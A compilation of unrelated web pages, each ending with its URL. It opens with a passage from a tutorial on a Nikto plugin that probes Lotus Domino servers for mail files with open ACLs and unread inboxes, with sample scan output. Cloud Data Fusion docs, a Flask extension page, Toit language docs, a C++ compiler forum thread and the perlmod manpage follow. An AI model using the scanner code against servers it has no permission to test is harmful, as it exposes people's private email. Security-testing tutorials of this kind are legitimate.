  foreach my $USERFILE (@MAILFILES){
    # example.com/mailsrv54/ataylor.nsf/($Inbox)?OpenView
    ($RES, $CONTENT) = fetch("/$USERFILE".'/($Inbox)?OpenView',"GET","");
    nprint("request for $USERFILE returned $RES","d");
    if( $RES eq 200 ){
      if($CONTENT !~ /No documents found/i){
        nprint("+ Found open ACLs on mail file: ". $USERFILE . " - inbox has contents!");
      }else{
        nprint("+ Found open ACLs on mail file: ". $USERFILE);
      }
    }
  }
}

The code is simple and straightforward and relies on the core Nikto routine fetch( ) to do the work. You should notice the regular expression that matches on No documents found. This helps us immediately identify inboxes with unread email. Now the plug-in is complete! Be sure to run it to test it out. The following is an example of the output you can expect to see:

[notroot]$ ./nikto.pl -h
---------------------------------------------------------------------------
- Nikto 1.32/1.27 -
+ Target IP: 192.168.3.169
+ Target Hostname:
+ Target Port: 80
+ Start Time: Thu Jan 16 17:25:13 2004
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Lotus-Domino
+ Found bad ACLs on mail file: mailsrv54/aodd5221.nsf
+ Found bad ACLs on mail file: mailsrv56/heng3073.nsf
+ Found bad ACLs on mail file: mailsrv54/skape7782.nsf - inbox has contents!
+ Found bad ACLs on mail file: mailsrv58/optyx2673.nsf - inbox has contents!
+ Found bad ACLs on mail file: mailsrv56/iller4302.nsf
+ Found bad ACLs on mail file: mailsrv58/ackie3165.nsf
...
http://commons.oreilly.com/wiki/index.php?title=Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Writing_Plug-ins_for_the_Nikto_Vulnerability_Scanner&redirect=no
This page describes how to change the Dataproc image version used by your Cloud Data Fusion instance.

Before you begin

Stop all real-time pipelines and Replication jobs in the Cloud Data Fusion instance. If a real-time pipeline or Replication job is running when you change the Dataproc image version, the changes will not be applied to the pipeline execution. For real-time pipelines, if checkpointing is enabled, stopping these pipelines does not cause any data loss. For Replication jobs, as long as the database logs are available, stopping and starting the Replication job does not cause data loss.

Console

Go to the Cloud Data Fusion Instances page (in CDAP, click View Instances) and open the instance where you need to stop a pipeline.
Open each real-time pipeline in the Pipeline Studio and click Stop.
Open each Replication job on the Replicate page and click Stop.

REST API

To retrieve all pipelines, use the following REST API call:

curl -X GET -H "Authorization: Bearer ${AUTH_TOKEN}" \
"${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps"

Replace NAMESPACE_ID with the name of your namespace.

To stop a real-time pipeline, use the following REST API call:

curl -X POST -H "Authorization: Bearer ${AUTH_TOKEN}" \
"${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps/PIPELINE_NAME/spark/DataStreamsSparkStreaming/stop"

Replace NAMESPACE_ID with the name of your namespace and PIPELINE_NAME with the name of the real-time pipeline.

To stop a Replication job, use the following REST API call:

curl -X POST -H "Authorization: Bearer ${AUTH_TOKEN}" \
"${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps/REPLICATION_JOB_NAME/workers/DeltaWorker/stop"

Replace NAMESPACE_ID with the name of your namespace and REPLICATION_JOB_NAME with the name of the Replication job.

For more information, see stopping real-time pipelines and stopping Replication jobs.
Check and override the default version of Dataproc in Cloud Data Fusion

In the Google Cloud console, go to the Instances page (in CDAP, click View Instances) and open the instance.
Click System Admin > Configuration > System Preferences.
If a Dataproc image is not specified in System Preferences, or to change the preference, click Edit System Preferences.
Enter the following text in the Key field: system.profile.properties.imageVersion
Enter the desired Dataproc image in the Value field, such as 1.5-debian10.
Click Save & Close.

This change affects the entire Cloud Data Fusion instance, including all its namespaces and pipeline runs, unless the image version property is overridden in a namespace, pipeline, or runtime argument in your instance.

Change Dataproc image version in a Namespace or Pipeline Runtime Argument

If you have not overridden the Dataproc image version in Namespace Preferences or in Pipeline Runtime Arguments, you can skip these steps.

Namespace Preferences

If you have overridden the image version in your namespace properties, follow these steps:

Open your instance in the Cloud Data Fusion UI.
Click System Admin > Configuration > Namespaces.
Open each namespace and click Preferences.
Make sure that there is no override with the key system.profile.properties.imageVersion and an incorrect image version value.
Click Finish.

Pipeline Runtime Arguments

If you have overridden the image version with a property in your pipeline's Runtime Arguments, follow these steps:

Open your instance in the Cloud Data Fusion UI.
Click Pipeline > List and select the desired pipeline. The pipeline opens on the Pipeline Studio page.
Click the dropdown menu next to Run. The Runtime Arguments window opens.
Make sure that there is no override with the key system.profile.properties.imageVersion and an incorrect image version value.
Click Save.
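The instance-wide preference can also be set over REST instead of through the console. The call below assumes CDAP's standard preferences endpoint (PUT /v3/preferences with a JSON map of properties); verify the path against your CDAP version before relying on it. ${AUTH_TOKEN} and ${CDAP_ENDPOINT} are the same variables used in the REST calls earlier on this page.

```
curl -X PUT -H "Authorization: Bearer ${AUTH_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{"system.profile.properties.imageVersion": "1.5-debian10"}' \
  "${CDAP_ENDPOINT}/v3/preferences"
```

As with the console workflow, this affects the whole instance unless a namespace, pipeline, or runtime argument overrides the property.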
Recreate static Dataproc clusters used by Cloud Data Fusion with the desired image version

If you use existing Dataproc clusters with Cloud Data Fusion, follow the Dataproc guide to recreate the clusters with the desired Dataproc image version for your Cloud Data Fusion version. If any pipelines are running while the cluster is being recreated, those pipelines will fail. Subsequent runs should run on the recreated cluster.

Alternatively, you can create a new Dataproc cluster with the desired Dataproc image version, then delete and recreate the compute profile in Cloud Data Fusion with the same compute profile name and the updated Dataproc cluster name. This way, running batch pipelines can complete execution on the existing cluster and new pipeline runs will take place on the new Dataproc cluster. You can delete the old Dataproc cluster after you have confirmed that all pipeline runs have completed.

Check that the Dataproc image version is updated

Console

In the Google Cloud console, go to the Dataproc Clusters page.
Open the Cluster details page for the new cluster that Cloud Data Fusion created when you specified the new version.
The Image version field has the new value that you specified in Cloud Data Fusion.

REST API

Get the list of clusters with their metadata:

curl -X GET -H "Authorization: Bearer ${AUTH_TOKEN}" \

Replace the following:

NAMESPACE_ID with the name of your namespace
REGION_ID with the name of the region where your clusters are located

Under that JSON object, see the image in config > softwareConfig > imageVersion.
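If you prefer the command line for this check, the gcloud CLI can read the same field directly from the cluster metadata. This assumes the standard gcloud Dataproc surface; substitute your own cluster name and region.

```
gcloud dataproc clusters describe CLUSTER_NAME \
  --region=REGION_ID \
  --format="value(config.softwareConfig.imageVersion)"
```

The command prints only the image version string, which makes it convenient in scripts that verify a fleet of clusters.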
https://cloud.google.com/data-fusion/docs/support/troubleshooting-dataproc-image
Idempotent requests for Flask applications

Project description

Flask-Idempotent is an exceedingly simple (by design) idempotent request handler for Flask. Implemented as an extension, using Redis as both a lock and response datastore for speed and ease of use and implementation, this will help you simply add idempotency to any endpoint on your Flask application.

Installation

$ pip install flask-idempotent

Usage

from flask import Flask
from flask_idempotent import Idempotent

my_app = Flask(__name__)
Idempotent(my_app)

<form>
  {{ idempotent_input() }}
  <!-- the rest of your form -->
</form>

And that's it! (well, if the defaults work for you)

How it Works

Any request that includes __idempotent_key in the request arguments or post data, or X-Idempotent-Key in the request's headers, will be tracked as an idempotent request. This only takes effect for 240 seconds by default, but this is configurable.

When the first request with a key comes in, Flask-Idempotent will attempt to set IDEMPOTENT_{KEY} in Redis. It will then process the request like normal, saving the response in Redis for future requests to return. It also uses Redis' pub/sub infrastructure to send a notification to any other requests with the same key.

Any subsequent (simultaneous or otherwise) requests will fail to set this key in Redis, as it's already set. They will then wait for a pub/sub notification that the master request has finished, retrieve the prior response, and return that.

Why should I care?

You can't trust user input. That's rule one of web development. This won't beat malicious attempts to attack your form submissions, but it will help when a user submits a page twice, or an API request is sent twice, due to network failure or otherwise. This will prevent those double submissions and any subsequent results of them.

Configuration

Flask-Idempotent requires Redis to function. It defaults to using Redis on the local machine, and the following configuration values are available.
Just set them in your Flask configuration:

# The Redis host URL
REDIS_URL = 'redis://some-host:6379/'
# In seconds, the timeout for a slave request to wait for the first to
# complete
IDEMPOTENT_TIMEOUT = 60
# In seconds, the amount of time to store the master response before
# expiration in Redis
IDEMPOTENT_EXPIRE = 240
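The pattern described above (an atomic set-if-absent acting as the lock, with the first request's response cached for replays) can be sketched independently of Flask and Redis. The snippet below is illustrative only: a plain dict stands in for Redis, the class name IdempotentStore is invented for the example, and the pub/sub wait is reduced to a comment.

```python
import threading

class IdempotentStore:
    """Toy stand-in for the Redis-backed logic described above:
    the first request for a key wins the "lock" and stores its
    response; replays get the cached response instead of
    re-running the handler."""

    def __init__(self):
        self._mutex = threading.Lock()
        self._responses = {}

    def run(self, key, handler):
        with self._mutex:
            # Mimics the atomic set-if-absent (SETNX) step: only
            # the first request for a key executes the handler.
            is_master = key not in self._responses
            if is_master:
                self._responses[key] = None
        if is_master:
            response = handler()
            with self._mutex:
                # A real implementation would also publish a
                # pub/sub notification here to wake up waiters.
                self._responses[key] = response
            return response
        # Waiters simply read the cached response.
        with self._mutex:
            return self._responses[key]

store = IdempotentStore()
calls = []

def create_order():
    calls.append(1)          # side effect we want to run only once
    return "order created"

first = store.run("form-token-123", create_order)
replay = store.run("form-token-123", create_order)
```

Both calls return the same response, but the handler (and its side effect) runs only once, which is exactly the double-submission protection the extension provides.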
https://pypi.org/project/Flask-Idempotent/
Toit definitions

Library

A library is a code unit developers can import. There is a one-to-one relationship between a Toit file and a library. Libraries can be imported with the import clause.

SDK libraries

The SDK comes with libraries documented in the Toit standard libraries browser. The core module is automatically imported into every file. It contains common classes, like int, string, or List.

Terms

Locals: a variable that is either declared within a function or passed to a function as an argument, where it is received as a parameter.

Globals: a variable declared outside the scope of a function or class. Globals are initialized at first access, and remain alive until the end of the program. Constants are a special case of globals, defined with a ::= assignment. By convention they have an ALL_CAPS_NAME (see Toit globals and constants).

Within a class, the following items are available: constructors, statics, factories, fields, methods.

- Constructor: a way to construct an object of the given type, always defined by the constructor keyword. See more details here.
- Named constructors allow more than one constructor with the same signature, and often make code more readable. See more details here. For example, the string class has a constructor called constructor.from_rune rune/int. Thus, when reading the instantiation point x := string.from_rune 'X' it is clear that we construct a string with the character 'X'.
- A Factory is a constructor or named constructor with a return. See an example below and more details here.
- Static functions and fields: these are tied to the class rather than to individual objects. Inside a class, static fields and functions are marked with the keyword static. Constructors and factories are implicitly static. Static fields are often constants - which can be inferred from their capitalized names, and whether they are final (defined with ::=). Inside a class, you can refer to static entries directly.
Outside the class, static entries must be prefixed with the class name.

class A:
  static some_static_field := 499

  foo:
    // Inside the class, static entries can be referred to directly.
    print some_static_field

main:
  // But outside the class, they must be referred to through the class name:
  print A.some_static_field

- Methods and instance fields: everything that needs to go through an object. Methods without arguments behave similarly to instance fields.

// Implicitly static, not inside a class, and doesn't require one.
foo:
  print "foo"

// Implicitly static, can be accessed without a class.
some_global := 499

// A static constant.
CONSTANT ::= 42

class A:
  // Static, as you can write `A` without creating an `A` first.
  constructor:
    ...

  // Static, or just a different way to write a constructor.
  constructor.named:
    ...

  // A factory is just a constructor with a `return`. From the
  // outside there is no difference to a constructor.
  constructor.my_factory:
    return singleton

  // A static field.
  static singleton ::= A

  // A static function that doesn't require the creation of an
  // object `A`. It's important to see that `A.static_in_A`
  // doesn't first create `A` and then call `static_in_A`. The
  // leading `A.` is just so we can find the static function.
  static static_in_A:
    print "static fun"

  // Same as for the static function: this is a field that lives
  // independent of an instance.
  // If you write `A.static_field = 1` followed by
  // `print A.static_field`, then you would get `1`. Static
  // fields are really just like scoped globals.
  static static_field := 42

  // This non-static method can only be used on an object, like
  // `a := A` followed by `a.method`.
  method:
    print "method"

  // An instance field.
  // Operates on an object: `a := A` followed by `a.field = 42`
  // would change the field of the object. A new, unmodified,
  // object would again be constructed with 11 in this field:
  // `a2 := A` followed by `print a2.field` would print 11.
  field := 11

main:
  // Statics can be accessed directly or must be prefixed
  // with the class name:
  foo                   // Calls foo.
  print some_global     // Prints the global.
  print CONSTANT        // Prints the constant.
  a := A                // Creates a new A.
  a2 := A.named         // Creates a new A.
  a3 := A.my_factory    // From the outside the same syntax as `A.named`.
  A.static_in_A         // Calls the static function *without* creating an object first.
  A.static_field = 11   // Does *not* create an object first.
  print A.static_field  // Prints the static field 11.
  a.method              // Invokes the instance method on `a`.
  a2.method             // Invokes it on `a2`.
  print a.field         // Reads the field in `a`. => 11
  a.field = 42          // Only changes the field in `a`, but not a2 or a3.
  print a.field         // => 42
  print a2.field        // => 11

Type

Toit is optionally typed. That is, it is possible, but not required, to annotate variable declarations with types. A variable is typed if it is followed by a / and a type name. For example, foo x/y means the function foo takes a variable x with type y. By default types are non-nullable, which means null is not a valid value.

class Coordinate:
  // An instance field that must be initialized by constructors.
  // By writing `:= ?` we indicate that all constructors
  // must initialize the field.
  x /int := ?
  y /int := ?

  // We don't need to specify the type for constructor
  // arguments that are written directly to a typed field.
  constructor .x .y:

main:
  a := Coordinate 0 0
  // Error! The types of the fields (and therefore the
  // constructor arguments) are non-nullable, so null is not
  // a valid argument here:
  b := Coordinate null null  // Error!

If we want a nullable type, we write a question mark ? after the type name. For example, a field declared as bar /Bar? := null can hold a reference to an instance of the Bar class or interface, but it can also be null, which also happens to be its initial value.

Any
In addition, Toit has any (for every possible type) and none (when no value is accepted). For example, in the following example rename from/any to/any -> any , the function rename takes 2 arguments: foo of type any and to of type any. any is a special type meaning “any” type. It means that the code really works for any input type or that the type-info is missing. The -> indicates the return type of the function, so foo -> bar means that the function foo returns bar. The rename function in the example rename from/any to/any -> any returns any. In the following example the parameter param, the local my_var, and the global glob are all typed in the following example: foo param/int: // The parameter 'param' must be of type int. // The variable 'my_var' is typed as 'float'. The second // '/' is a division. my_var /float := param / 3.14 glob /string := "the global 'glob' is typed as string" The type of variable is enforced by the Virtual Machine. Every time a value is stored in the variable, the VM checks that the type is correct. If it isn't, a runtime exception is thrown. Types are also very helpful during development: the IDE can use the typing information to provide code completion, or warnings when types don't match. Return types Functions can also declare their return type by writing -> followed by the return type. The -> type can be anywhere in the signature, but it's convention to put it at the end of the line that declares the name of a function: // A function that doesn't return anything. foo -> none: print "not returning anything" // A function that takes an int and returns an int. bar x/int -> int: return x + 1 gee with/string -> float // Returns a float. arguments / int on / string different / bool --lines: return 3.14 None The return type none is never needed, as Toit can see whether a method returns something or not. It can, however, help readability of code, and prevent developers from accidentally returning a value. When to Write Types? 
In a correct program, types don't have any effect. As such, they are most important during the development process. Similar to comments, there isn't always a clear-cut rule on when to write types, and different teams don't always agree on the "best" amount of type annotations.

We recommend writing types for fields and in function signatures (parameters and return type). This dramatically improves the development experience, as the IDE can use those types to suggest code completions. This is especially true for functions and variables that are intended to be used by other developers. As a general guideline: the more users your code has, the more types it needs.

Local variables often don't need explicit types, as the IDE can usually infer them. If the IDE can't infer the type, it is a judgment call whether the annotation is warranted.
https://docs.toit.io/language/definitions
fdstream problem using ImproveCascade & OpenCascade 5.1

Hi,

I've got a problem using ImproveCascade with OpenCascade 5.1. When compiling the draw workspace I get these errors:

Draw_Main.cxx
..\..\inc\fdstream.hpp(90) : error C2512: 'basic_ostream
..\..\inc\fdstream.hpp(90) : error C2614: 'fdostream' : illegal member initialization: 'ostream' is not a base or member
..\..\inc\fdstream.hpp(109) : error C2258: illegal pure syntax, must be '= 0'
..\..\inc\fdstream.hpp(109) : error C2252: 'pbSize' : pure specifier can only be specified for functions
..\..\inc\fdstream.hpp(110) : error C2258: illegal pure syntax, must be '= 0'
..\..\inc\fdstream.hpp(110) : error C2252: 'bufSize' : pure specifier can only be specified for functions
..\..\inc\fdstream.hpp(111) : error C2065: 'bufSize' : undeclared identifier
..\..\inc\fdstream.hpp(111) : error C2065: 'pbSize' : undeclared identifier
..\..\inc\fdstream.hpp(111) : error C2057: expected constant expression
..\..\inc\fdstream.hpp(111) : warning C4200: nonstandard extension used : zero-sized array in struct/union
..\..\inc\fdstream.hpp(179) : error C2229: class 'boost::fdistream' has an illegal zero-sized array

I'm using VC++ 6.0 and the fdstream.hpp from the linked site. (BTW, I fixed the problem with the 'flush' variable in 5.1 by renaming it to 'aflush', so I don't think that could be the problem!?)

Thanks for any help!!

Ciao
hhahn

Re: fdstream problem using

Hm, with VC6 I would recommend using STLport. Perhaps this helps. But I'm not sure if ImproveCascade works with 5.1.

Patrik

Re: fdstream problem using

Hi,

I just downloaded STLport and tried it. Still the same error! I compiled the libs, put the stlport folder in my include path (first place) and the lib folder in my lib path. Is there anything I missed?

Ciao
hhahn

Re: fdstream problem using

Hi again,

I don't see any clear answers from looking at your compiler output and the fdstream.hpp file. I've never tried using fdstream.hpp with Visual Studio 6.0.
You could try making a separate little one-file project and #include "fdstream.hpp" to see if it compiles under 6.0 when separated from Open Cascade.

It seems strange to me that the fdstream.hpp code uses "std::" in front of everything, but your first error message just says "basic_ostream" has no default constructor instead of saying "std::basic_ostream". I'm pretty sure that with MSVS .NET and later it prints the full namespace qualifier in the error messages; I don't remember if MSVS 6.0 did that or not.

Perhaps Open Cascade 5.1 #defines some macros that are interfering with fdstream.hpp? Hopefully they didn't "#define std", i.e. define std to be nothing, or something crazy like that...

Unfortunately I won't be able to take a look at this myself until later next week. Let me know if you discover anything else.

-- Conrad

Re: fdstream problem using

Hi,

I just want to give you an update on the issue. I made the test you suggested (a test project which includes fdstream) and I wasn't able to compile it, so it seems to be a VC++ 6.0 problem. Compiling with OpenCascade 5.0 gives me the same error, so it's definitely not an OCC problem. Sorry for causing the confusion!

Thanks for your help!

Ciao
hhahn

Re: fdstream problem using

Hi!

I just got some emails from people with the same problem, asking for help. I haven't found a good solution yet, and I'm not sure I understand enough C++ internals to fix the problem.

The workaround I'm using is to avoid the "using namespace ..." directive. Just include the header file the normal way. I know it's a bit awkward, because you always have to put std:: in front of every declaration (std::vector aVector;). It was announced that the next version of OCC will support the new STL headers. So I'm waiting ;-)

Any other solution is welcome!

Ciao
Holger
https://www.opencascade.com/content/fdstream-problem-using-improvecascadeopencascade51
<HR>
<P>
<H1><A NAME="NAME">NAME</A></H1>
<P>
perlmod - Perl modules (packages and symbol tables)
<P>
<HR>
<H1><A NAME="DESCRIPTION">DESCRIPTION</A></H1>
<P>
<HR>
<H2><A NAME="Packages">Packages</A></H2>
<P>
Perl provides a mechanism for alternative namespaces to protect packages from stomping on each other's variables. In fact, there's really no such thing as a global variable in Perl (although some identifiers default to the main package instead of the current one). The package statement declares the compilation unit as being in the given namespace. The scope of the package declaration is from the declaration itself through the end of the enclosing block, [perlfunc:eval|eval], [perlfunc:sub|sub], or end of file, whichever comes first (the same scope as the <CODE>my()</CODE> and <CODE>local()</CODE> operators). All further unqualified dynamic identifiers will be in this namespace. <FONT SIZE=-1>A</FONT> package statement only affects dynamic variables--including those you've used <CODE>local()</CODE> on--but <EM>not</EM> lexical variables created with <CODE>my()</CODE>. If the package name is null, the <CODE>main</CODE> package is assumed. That is, <CODE>$::sail</CODE> is equivalent to <CODE>$main::sail</CODE>.
<P>
The old package delimiter was a single quote, but double colon is now the preferred delimiter, in part because it's more readable to humans, and in part because it's more readable to <STRONG>emacs</STRONG> macros. It also makes <FONT SIZE=-1>C++</FONT> programmers feel like they know what's going on--as opposed to using the single quote as separator, which was there to make Ada programmers feel like they knew what's going on. Because the old-fashioned syntax is still supported for backwards compatibility, if you try to use a string like <CODE>"This is $owner's house"</CODE>, you'll be accessing <CODE>$owner::s</CODE>; that is, the <A HREF="perlop.html#item__s">$s</A> variable in package <CODE>owner</CODE>, which is probably not what you meant.
Use braces to disambiguate, as in <CODE>"This is ${owner}'s house"</CODE>.
<P>
Packages may be nested inside other packages: <CODE>$OUTER::INNER::var</CODE>. This implies nothing about the order of name lookups, however. All symbols are either local to the current package, or must be fully qualified from the outer package name down. For instance, there is nowhere within package <CODE>OUTER</CODE> that <CODE>$INNER::var</CODE> refers to <CODE>$OUTER::INNER::var</CODE>. It would treat package <CODE>INNER</CODE> as a totally separate global package.
<P>
Only identifiers starting with letters (or underscore) are stored in a package's symbol table. All other symbols are kept in package <CODE>main</CODE>, including all of the punctuation variables like $_. In addition, when unqualified, the identifiers <FONT SIZE=-1>STDIN,</FONT> <FONT SIZE=-1>STDOUT,</FONT> <FONT SIZE=-1>STDERR,</FONT> <FONT SIZE=-1>ARGV,</FONT> <FONT SIZE=-1>ARGVOUT,</FONT> <FONT SIZE=-1>ENV,</FONT> <FONT SIZE=-1>INC,</FONT> and <FONT SIZE=-1>SIG</FONT> are forced to be in package <CODE>main</CODE>, even when used for other purposes than their builtin one. Note also that, if you have a package called <CODE>m</CODE>, <CODE>s</CODE>, or <CODE>y</CODE>, then you can't use the qualified form of an identifier because it will be interpreted instead as a pattern match, a substitution, or a transliteration.
<P>
(Variables beginning with underscore used to be forced into package main, but we decided it was more useful for package writers to be able to use leading underscore to indicate private variables and method names. <CODE>$_</CODE> is still global though.)
<P>
<CODE>Eval()ed</CODE> strings are compiled in the package in which the <CODE>eval()</CODE> was compiled. (Assignments to <CODE>$SIG{}</CODE>, however, assume the signal handler specified is in the <CODE>main</CODE> package. Qualify the signal handler name if you wish to have a signal handler in a package.)
For an example, examine <EM>perldb.pl</EM> in the Perl library. It initially switches to the <CODE>DB</CODE> package so that the debugger doesn't interfere with variables in the script you are trying to debug. At various points, however, it temporarily switches back to the <CODE>main</CODE> package to evaluate various expressions in the context of the <CODE>main</CODE> package (or wherever you came from). See [perlman:perldebug|the perldebug manpage].
<P>
The special symbol <CODE>__PACKAGE__</CODE> contains the current package, but cannot (easily) be used to construct variables.
<P>
See [perlman:perlsub|the perlsub manpage] for other scoping issues related to <CODE>my()</CODE> and <CODE>local(),</CODE> and [perlman:perlref|the perlref manpage] regarding closures.
<P>
<HR>
<H2><A NAME="Symbol_Tables">Symbol Tables</A></H2>
<P>
The symbol table for a package happens to be stored in the hash of that name with two colons appended. The main symbol table's name is thus <CODE>%main::</CODE>, or <CODE>%::</CODE> for short. Likewise the symbol table for the nested package mentioned earlier is named <CODE>%OUTER::INNER::</CODE>.
<P>
The value in each entry of the hash is what you are referring to when you use the <CODE>*name</CODE> typeglob notation. In fact, the following have the same effect, though the first is more efficient because it does the symbol table lookups at compile time:
<P>
<PRE>
    local *main::foo = *main::bar;
    local $main::{foo} = $main::{bar};
</PRE>
<P>
You can use this to print out all the variables in a package, for instance. The standard <EM>dumpvar.pl</EM> library and the <FONT SIZE=-1>CPAN</FONT> module Devel::Symdump make use of this.
<P>
Assignment to a typeglob performs an aliasing operation, i.e.,
<P>
<PRE>
    *dick = *richard;
</PRE>
<P>
causes variables, subroutines, formats, and file and directory handles accessible via the identifier <CODE>richard</CODE> also to be accessible via the identifier <CODE>dick</CODE>.
If you want to alias only a particular variable or subroutine, you can assign a reference instead:
<P>
<PRE>
    *dick = \$richard;
</PRE>
<P>
Which makes <CODE>$richard</CODE> and <CODE>$dick</CODE> the same variable, but leaves <CODE>@richard</CODE> and <CODE>@dick</CODE> as separate arrays. Tricky, eh?
<P>
This mechanism may be used to pass and return cheap references into or from subroutines if you don't want to copy the whole thing. It only works when assigning to dynamic variables, not lexicals.
<P>
<PRE>
    %some_hash = ();            # can't be my()
    *some_hash = fn( \%another_hash );
    sub fn {
        local *hashsym = shift;
        # now use %hashsym normally, and you
        # will affect the caller's %another_hash
        my %nhash = (); # do what you want
        return \%nhash;
    }
</PRE>
<P>
On return, the reference will overwrite the hash slot in the symbol table specified by the <CODE>*some_hash</CODE> typeglob. This is a somewhat tricky way of passing around references cheaply when you don't want to have to remember to dereference variables explicitly.
<P>
Another use of symbol tables is for making ``constant'' scalars.
<P>
<PRE>
    *PI = \3.14159265358979;
</PRE>
<P>
Now you cannot alter <FONT SIZE=-1>$PI,</FONT> which is probably a good thing all in all. This isn't the same as a constant subroutine, which is subject to optimization at compile-time. This isn't. <FONT SIZE=-1>A</FONT> constant subroutine is one prototyped to take no arguments and to return a constant expression. See [perlman:perlsub|the perlsub manpage] for details on these. The <CODE>use constant</CODE> pragma is a convenient shorthand for these.
<P>
You can say <CODE>*foo{PACKAGE}</CODE> and <CODE>*foo{NAME}</CODE> to find out what name and package the <CODE>*foo</CODE> symbol table entry comes from.
This may be useful in a subroutine that gets passed typeglobs as arguments:
<P>
<PRE>
    sub identify_typeglob {
        my $glob = shift;
        print 'You gave me ', *{$glob}{PACKAGE}, '::', *{$glob}{NAME}, "\n";
    }
    identify_typeglob *foo;
    identify_typeglob *bar::baz;
</PRE>
<P>
This prints
<P>
<PRE>
    You gave me main::foo
    You gave me bar::baz
</PRE>
<P>
The *foo{THING} notation can also be used to obtain references to the individual elements of *foo, see [perlman:perlref|the perlref manpage].
<P>
<HR>
<H2><A NAME="Package_Constructors_and_Destruc">Package Constructors and Destructors</A></H2>
<P>
There are two special subroutine definitions that function as package constructors and destructors. These are the <CODE>BEGIN</CODE> and <CODE>END</CODE> routines. The [perlfunc:sub|sub] is optional for these routines.
<P>
<FONT SIZE=-1>A</FONT> <CODE>BEGIN</CODE> subroutine is executed as soon as possible, that is, the moment it is completely defined, even before the rest of the containing file is parsed. You may have multiple <CODE>BEGIN</CODE> blocks within a file--they will execute in order of definition. Because a <CODE>BEGIN</CODE> block executes immediately, it can pull in definitions of subroutines and such from other files in time to be visible to the rest of the file. Once a <CODE>BEGIN</CODE> has run, it is immediately undefined and any code it used is returned to Perl's memory pool. This means you can't ever explicitly call a <CODE>BEGIN</CODE>.
<P>
An <CODE>END</CODE> subroutine is executed as late as possible, that is, when the interpreter is being exited, even if it is exiting as a result of a <CODE>die()</CODE> function. (But not if it's polymorphing into another program via [perlfunc:exec|exec], or being blown out of the water by a signal--you have to trap that yourself (if you can).)
You may have multiple <CODE>END</CODE> blocks within a file--they will execute in reverse order of definition; that is: last in, first out <FONT SIZE=-1>(LIFO).</FONT>
<P>
Inside an <CODE>END</CODE> subroutine, <CODE>$?</CODE> contains the value that the script is going to pass to [perlfunc:exit|exit()]. You can modify <CODE>$?</CODE> to change the exit value of the script. Beware of changing <CODE>$?</CODE> by accident (e.g. by running something via [perlfunc:system|system]).
<P>
Note that when you use the <STRONG>-n</STRONG> and <STRONG>-p</STRONG> switches to Perl, <CODE>BEGIN</CODE> and <CODE>END</CODE> work just as they do in <STRONG>awk</STRONG>, as a degenerate case. As currently implemented (and subject to change, since it's inconvenient at best), both <CODE>BEGIN</CODE> <EM>and</EM> <CODE>END</CODE> blocks are run when you use the <STRONG>-c</STRONG> switch for a compile-only syntax check, although your main code is not.
<P>
<HR>
<H2><A NAME="Perl_Classes">Perl Classes</A></H2>
<P>
There is no special class syntax in Perl, but a package may function as a class if it provides subroutines to act as methods. Such a package may also derive some of its methods from another class (package) by listing the other package name in its global <CODE>@ISA</CODE> array (which must be a package global, not a lexical).
<P>
For more on this, see [perlman:perltoot|the perltoot manpage] and [perlman:perlobj|the perlobj manpage].
<P>
<HR>
<H2><A NAME="Perl_Modules">Perl Modules</A></H2>
<P>
<FONT SIZE=-1>A</FONT> module is just a package that is defined in a library file of the same name, and is designed to be reusable. It may do this by providing a mechanism for exporting some of its symbols into the symbol table of any package using it. Or it may function as a class definition and make its semantics available implicitly through method calls on the class and its objects, without explicit exportation of any symbols. Or it can do a little of both.
<P>
For example, to start a normal module called Some::Module, create a file called Some/Module.pm and start with this template:
<P>
<PRE>
    package Some::Module;  # assumes Some/Module.pm
</PRE>
<P>
<PRE>
    use strict;
</PRE>
<P>
<PRE>
    BEGIN {
        use Exporter   ();
        use vars       qw($VERSION @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS);
</PRE>
<P>
<PRE>
        # set the version for version checking
        $VERSION     = 1.00;
        # if using RCS/CVS, this may be preferred
        $VERSION = do { my @r = (q$Revision: 2.21 $ =~ /\d+/g); sprintf "%d."."%02d" x $#r, @r }; # must be all one line, for MakeMaker
</PRE>
<P>
<PRE>
        @ISA         = qw(Exporter);
        @EXPORT      = qw(&func1 &func2 &func4);
        %EXPORT_TAGS = ( );     # eg: TAG => [ qw!name1 name2! ],
</PRE>
<P>
<PRE>
        # your exported package globals go here,
        # as well as any optionally exported functions
        @EXPORT_OK   = qw($Var1 %Hashit &func3);
    }
    use vars      @EXPORT_OK;
</PRE>
<P>
<PRE>
    # non-exported package globals go here
    use vars      qw(@more $stuff);
</PRE>
<P>
<PRE>
    # initialize package globals, first exported ones
    $Var1   = '';
    %Hashit = ();
</PRE>
<P>
<PRE>
    # then the others (which are still accessible as $Some::Module::stuff)
    $stuff  = '';
    @more   = ();
</PRE>
<P>
<PRE>
    # all file-scoped lexicals must be created before
    # the functions below that use them.
</PRE>
<P>
<PRE>
    # file-private lexicals go here
    my $priv_var    = '';
    my %secret_hash = ();
</PRE>
<P>
<PRE>
    # here's a file-private function as a closure,
    # callable as &$priv_func;  it cannot be prototyped.
    my $priv_func = sub {
        # stuff goes here.
    };
</PRE>
<P>
<PRE>
    # make all your functions, whether exported or not;
    # remember to put something interesting in the {} stubs
    sub func1      {}    # no prototype
    sub func2()    {}    # proto'd void
    sub func3($$)  {}    # proto'd to 2 scalars
</PRE>
<P>
<PRE>
    # this one isn't exported, but could be called!
    sub func4(\%)  {}    # proto'd to 1 hash ref
</PRE>
<P>
<PRE>
    END { }       # module clean-up code here (global destructor)
</PRE>
<P>
Then go on to declare and use your variables in functions without any qualifications.
See <U>the Exporter manpage</U><!--../lib/Exporter.html--> and the [perlman:perlmodlib|the perlmodlib manpage] for details on mechanics and style issues in module creation.
<P>
Perl modules are included into your program by saying
<P>
<PRE>
    use Module;
</PRE>
<P>
or
<P>
<PRE>
    use Module LIST;
</PRE>
<P>
This is exactly equivalent to
<P>
<PRE>
    BEGIN { require Module; import Module; }
</PRE>
<P>
or
<P>
<PRE>
    BEGIN { require Module; import Module LIST; }
</PRE>
<P>
As a special case
<P>
<PRE>
    use Module ();
</PRE>
<P>
is exactly equivalent to
<P>
<PRE>
    BEGIN { require Module; }
</PRE>
<P>
